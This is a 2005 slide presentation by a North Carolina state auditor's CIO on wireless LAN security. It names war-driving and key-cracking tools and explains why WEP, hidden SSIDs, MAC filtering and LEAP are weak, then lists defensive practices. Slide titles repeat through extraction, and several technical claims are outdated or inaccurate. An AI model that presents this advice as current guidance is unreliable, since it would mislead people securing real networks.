office of the state auditor north carolina wireless access and security dr. lenny superville, ph.d...

Office of the State Auditor North CarolinaOffice of the State Auditor North Carolina

Wireless Access and Security Wireless Access and Security

Dr. Lenny Superville, Ph.DCIO: NC Office of the State Auditor

NC Digital Government SummitSeptember 13-14, 2005


Focus in this PresentationFocus in this Presentation

• Why some Government Agencies choose to go with Proprietary instead of Standards Based Wireless Networks (WLANs)? Then, why some don’t?

• Some Well Used Proprietary Wireless Networks – Secret

• A survey of 802.11 (WI-FI)/WLANs wireless networking standards -Open

• Hackers’ tools used to sniff or intrude WLAN networks - Threats

• Effective options to keep unauthorized users/hackers out of WLAN networks- Countermeasures

• A Protection Methodology for WLAN Mobile Computing – While Performing Day-to-Day Operations


At the End of this Presentation, you should be able to At the End of this Presentation, you should be able to understand:understand:

• The major security concerns associated with the various wireless topologies, especially standards based

• The vulnerabilities of WLAN mobile computing environments

• The defenses available to protect WLAN mobile computing environments

• Best Practices to implement and maintain data security while using wireless data communications in day-to-day operations


Well Known Examples of Secured Proprietary Wireless/Wired Well Known Examples of Secured Proprietary Wireless/Wired NetworksNetworks

• Proprietary means (Secret encryption algorithm + Hardware):

• NIPRNET – (DoD) Unclassified but Sensitive Internet Protocol Router Network (BLUE)

• SIPRNET - (DoD) Classified Internet Protocol Router Network (RED)

• Lord Warrior Computer/Radio Subsystem – (Army) • CAISI (Army) – Combat Service Support Automated

Information System Interface. The lesser known the better security

Beware: This technology requires additional, costly hardware and IT staff to implement and maintain.


Characteristics of Proprietary Enterprise Wireless Secured Characteristics of Proprietary Enterprise Wireless Secured Networks – Complete SolutionNetworks – Complete Solution

• Sophisticated Encryption• Strong Authentication• Stringent Access Control• http://www.airdefense.net/• http://www.cisco.com/• http://www.airmagnet.com/• This combined technology implementation is so successful

because it acts as a secure gateway to numerous networks that must be accessed

• Questions – 5 minutes


WLANS - Wireless Networking/IEEE Standards - OpenWLANS - Wireless Networking/IEEE Standards - Open

WEP/WLAN/Radio Waves• 802.11 or WI-FI• 802.11b: 2.4Ghz, 11Mbps• 802.11a: 5.8Ghz, 54Mbps• 802.11g: 2.4Ghz, 54Mbps• 802.11i: Security solution for 802.11a/b/g

802.11a and 802.11g are both 54Mbps; 802.11g –loweroperating frequency, greater range

EAP: Short for Extensible Authentication Protocol, is a general protocol for authentication

IEEE 802.1x specifies how EAP should be encapsulated in LAN frames.


IEEE 802.11 WLANS (Standards Based - Open)IEEE 802.11 WLANS (Standards Based - Open)

WEP – Fix Key: Can be broken, Machine Authorization only •EAP-MD5 – No Certificates, TKIP (Rotating Key - Dictionary Attack), Human Authentication (802.1x), Server Authorization, •EAP-LEAP - No Certificates, TKIP •EAP-TLS - 2 Certificates, TKIP •EAP FAST – No Certificates (All CISCO)•EAP-TTLS – 1 Certificates, TKIP •EAP-PEAP – 1 Certificates, TKIP•EAP-WPA – 802.11 TKIP?•EAP-WPA2 – 802.11, CCMP, AES (3 Key sizes)•AES may be the answer to secure standards based WLANS.


Examples of Government Efforts to Implement 802.11 Wireless Examples of Government Efforts to Implement 802.11 Wireless Networks (WLANs)Networks (WLANs)

• In the 1990’s Wireless Equivalency Protocol (WEP) protocol was attempted but in 2001 security exposures were found in IEEE 802.11b networks

• In the 1990’s Data Encryption Standard (DES) was found to be vulnerable

• As of 2002, Advanced Encryption Standard (AES) with its 3 different key sizes – 128, 192 and 256 bit – may be the solution.

• As of 2005, AES is still the best bet for a secured WLAN.


Threats to WLANS - Threats to WLANS - A threat can be the perception of insecurity A threat can be the perception of insecurity

War Driving – driving through a street to discover wireless networks – for possible attack or just for the hell of it.

• Netstumbler is a well known freeware tool used to discover WLANs if the SSID (network name) is enabled

• Kismet discover WLANs even if the SSID is disabled

• KISMAC – Can be used for Security/Intrusion


Examples of War Driving Tools - Examples of War Driving Tools - Intrusion is entry by force or Intrusion is entry by force or without permission or welcomewithout permission or welcome

Check http://www.netstumbler.com• Netstumbler (Windows); Ministumbler (CE/PocketPC)

Check http://www.kismetwireless.net• Kismet (Linux/Unix)

Check http://www.remote-exploit.org• Wellenreiter (Linux/Unix)


Some Major Threats – Some Major Threats – You should knowYou should know

• Wired Mobile LANs used for training at Corp. sites (e.g. Ethernet)

• Wireless Mobile Wireless LANs used for training at Corp. sites (e.g. WEP, EAP-WPA2)

• Wireless Internet Service Provider (WISP) – Theft of Service• Hotspot Hijinks - Pagejacking• Wireless Sniffing – Interception of Traffic

Note: Wireless Sniffing is passive in nature and hence undetectable


Countermeasures to WLANS - Countermeasures to WLANS - A countermeasure an action taken A countermeasure an action taken to offset another actionto offset another action

A countermeasure is a system (usually for a military application) designed to prevent weapons (Threats) from acquiring and/or destroying a target (WLANs)


WLANs Countermeasures: Are they reliable?WLANs Countermeasures: Are they reliable?

• Wired Equivalent Privacy (WEP): a security protocol for wireless local area networks (WLANs)

• Attributes:• Defined in the 802.11b standard.• IEEE security for 802.11 – component of• Concerns:• AirSnort, once enough packets are gathered, can guess the

encryption password in less than a second• Uses RC4 encryption• Improper use of IV makes protocol vulnerable• Uses only one key – never changed

Note: 128 bit WEP is not officially part of the standard – some manufacturer’s key entry methods are incompatible


Countermeasures: Reliable? (Cont’d)Countermeasures: Reliable? (Cont’d)

• Service set identifier (SSID)/password is also referred to as a network name

• Attributes:• Blanks SSID field in 802.11 Beacon Flame• Disables response to any Probe Request• No SSID – no association – (T/F)?• Concerns:• SSID is broadcast in all client association frames in the

clear• Tools can force client to disassociate and re-associate to

expose the SSIDESSID-Jack, a freeware tool, can expose a hidden SSID in

seconds



• MAC Address Filtering: Media Access Control address, a hardware address that uniquely identifies each node of a network

• Attributes:• Place authorized MACs in each AP- If you don’t have a valid MAC, you can’t get in, (T/F)?

- Concerns: - MACs are easily sniffed

More than 50% of WLANS in major cities have no security.


Countermeasures: Reliable? (Cont’dCountermeasures: Reliable? (Cont’d))

Cisco LEAP (Lightweight Extensible Authentication Protocol):Attributes:

- Username/Password required for access- WEP keys rotate, making AirSnort useless- EAP-MSCHAPv2 can be used as an inner authentication method

with EAP-PEAP and EAP-TTLS.

- Concern: - Use of MS-CHAPv2 exposes credentials to devastating and

efficient dictionary attackSee: http://asleap.sourceforge.net for additional details

Best Buy and Lowe’s have experienced WLAN security breaches



IPSec Overlay: IPSec is an Internet standard framework for the establishment and management of data privacy between network entities.

Attributes: NAT and NAPT are techniques used to share and hide private IP addresses on edge devices like routers and firewalls.

Concerns: Unfortunately, when an IPsec session runs through NAT or

NAPT, security is often compromised1. Broadcast frames unencrypted2. ARP poisoning…. DoS attack

3. Client protection only after authentication



802.1x / WPA / 802.11i: Wi-Fi Protected Access for WLANSAttributes: • In the 802.11 standard, 802.1x authentication was optional; 802.1x

authentication is required in WPA; • The 802.11i standard addresses many of the security issues of the

original 802.11 standard.Concerns:• Single factor authentication (with few exceptions)• Multiple EAP types offer questionable security and vendor

incompatibilities• Attacks already presented against WPA

WPA is a built in security mechanism to prevent authentication attacks that shut down APs, sometimes up tp one minute.

Questions – 5 minutes


Best Practices to implement & maintain data security – Best Practices to implement & maintain data security – While While Performing Day-to-Day Operations with WLANsPerforming Day-to-Day Operations with WLANs

• Risk Analysis – Assess vulnerabilities of the Security Architecture

• Well Written Security Policies • A Secure Environment for Applications that produce data –

Strong Passwords• Secure Servers where the data is stored – Robust

Physical/Network Access• Secure Network Level – Firewall, IPS, IPD, etc• Protection against Rogue Access Points


A Protection Methodology - Now that some of the risks are understood, some prevention methods in a network infrastructure will be discussed.

• a. Host Protection – Remote Users• b. Data Encryption – Remote Users & Internal Network• c. Access Methods – Client vs Clientless VPNs• d. Authentication Technologies – Control Access to

Resources• e. Endpoint Security Compliance – Minimum Requirements

for Access• f. Protecting Internal Systems – Modular Approach

• g. Environments Favorable to Working with Wireless-

Firewalls, Anti-Virus, Strong Authentication, etc.


Example of a Secure Wireless/Wired Network InfrastructureExample of a Secure Wireless/Wired Network Infrastructure


a. Host Protection (Remote User) – A centrally managed anti-virus platform is key

Protecting a remote host is paramount to protecting corporate data, assets and services. This can be accomplished by using a centrally managed anti-virus platform that:

• • Provides visibility to remote systems upon connection• • Pushes updates to remote systems• • Synchronizes log information

A centrally managed host firewall platform that resides on the laptops and also provides some form of intrusion detection/ prevention will protect a remote host and the internal network.

Visibility on connection attempts and intrusion attempts will enable system administrators to fine-tune and adjust the technical controls and strengthen the overall posture of the organization.


b. Data Encryption - provides a measure of confidentialityprovides a measure of confidentiality

• Users need to be aware of the risks associated with data on mobile devices. Ask yourself “what will be the situation if this device is lost or stolen?”

• Data encryption provides a measure of confidentiality if the laptop were to be lost, stolen or accessed by an unauthorized individual.

• This can be accomplished by numerous commercially available products.

• One drawback to the user of data encryption is the potential for a user to experience latency while working with encrypted files.


c. Access Methods – A case for Client VPN (Fat Client)

A traditional virtual private network (VPN) connection that utilizes industry standard encryption can provide local-like access to remote resources.

VPNs typically require the use of a client or software utility that provides the mechanism for remote connectivity.

VPN clients can provide a level of security to the remote host by disallowing unsolicited connections from unauthorized hosts


c. Access Methods – A case for Clientless VPN (Thin Client)

Clientless VPNs are becoming more popular and are implemented using secure sockets layer (ssl) technology. These operate in the same manner as a secured website (online banking) and can provide an access capability similar to a client VPN.

There are limitations as to the types of services that can be used, but many of these limitations can be overcome by implementing enhancements such as web-enabled application servers.

Web-enabled application services, e.g. Citrix, can also mitigate many of the issues relative to client VPNs.

This approach provides only a “window” for the remote user to perform tasks, while using the operating system and resources of the application server.

System administrators can focus much of their effort on maintaining the application server and less on the remote hosts.


d. Authentication Technologies - To control access to resources

User authentication is the method used to control access to resources and ensure that only authorized individuals are permitted access to internal systems.

A standard username and password are the primary credentials required for access to most systems. These, however, can be easily compromised or guessed if a strong password policy isn’t implemented and enforced.

Two-factor authentication is a method that combines something you know (word, phrase, or numbers) with something you have (token). This method of access ensures that only individuals in possession of a device (token) with the correct pin can gain entry to corporate resources.

Brute force attacks launched against a corporate asset protected by two-factor authentication are futile.


e. Endpoint Security Compliance - minimum requirements for access

• Written policy, standards and guidelines are important and must address such issues as support, operating systems, minimum browser versions and minimum patch levels.

• This policy should also state what is prohibited, such as user-installed applications or spyware.

• This security policy enforcement can be accomplished with technical controls as a user attempts to connect to the network.


e. Endpoint Security Compliance – (Cont’d)

• Hosts can be audited for domain membership, the existence and status of anti-virus software, patch revision levels, intrusion detection signature revision levels and operating system configuration.

• Checks can also be performed to insure that rogue software is not present on the machine such as peer-to-peer file sharing applications and instant messaging.

• Checking the remote host “at the door”, prior to allowing access to internal resources, is a measure that can prevent the introduction of a multitude of issues to a protected network.


f. Protecting Internal Systems – modular, VLANS, depth/defense –

A solid network design will take a modular approach by placing resources in a manageable area that can be monitored and protected.

The use of virtual local area networks (VLANs) in conjunction with intrusion detection and intrusion prevention (IDS/IDP) systems can provide an additional layer of protection from potential attacks via remotely connected hosts. This method adds an additional layer of visibility to network activity internal to the organization.

Providing access to internal resources is necessary, but ensuring that the internal network is protected from the home/hotel/airport, etc users are oftentimes overlooked.


g. Environments Favorable to Wireless Computing - Firewall Firewall protection, anti-virus and strong authenticationprotection, anti-virus and strong authentication

Accessing the Internal Network is possible from many environments and across many types of potentially hostile networks.

To protect the remote device and its data while in these hostile environments, several minimum security controls should be in place:

Firewall protection, anti-virus and strong authentication for the remote access technology are essential.

Firewall protection can exist in the form of software on the PC, or in the form of hardware like the small consumer devices that are available.

Wireless hotspots, foreign corporate environments, hotel rooms, home networks and coffee shops are all capable of being “home” to a remote user, and all present threats to the “trusted” device while remote


Any Questions?Any Questions?

Dr. Lenny Superville, Phd

Chief Information Officer (CIO)

Office of the State Auditor

2 S. Salisbury Street

20601 Mail Service Center

Raleigh, NC 27699-0601

Tele: (919) 807 7625

Fax: (919) 807 7647

[email protected]

office of the state auditor north carolina wireless access and security dr. lenny superville, ph.d...

Documents

proprietary wireless

wireless networks wlans

nc office

wlan networks countermeasures

tkip eaptls

wlans standards

numerous networks

minutes slide